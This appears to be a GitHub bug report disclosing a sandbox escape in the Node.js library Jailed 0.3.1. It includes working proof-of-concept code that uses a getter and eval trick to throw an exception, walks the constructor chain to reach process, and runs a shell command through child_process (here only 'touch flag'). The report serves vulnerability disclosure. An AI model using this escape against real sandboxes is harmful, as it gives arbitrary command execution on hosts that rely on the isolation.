Open seongil-wi opened 1 year ago
Jailed version: 0.3.1
Node version: 18.15.0
run-jailed.js
```js
var jailed = require('jailed');
var api = {};
var plugin = new jailed.Plugin('./test_case.js', api);
```
test_case.js
```js
try{
    this.__defineGetter__("x", eval);
    eval.toString = toLocaleString
    eval < x
} catch(pp){
    pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
application.disconnect();
```
The sandbox can be escaped by three lines of code (notice that each line of code is essential to triggering the bug). We can execute arbitrary shell code using the process module.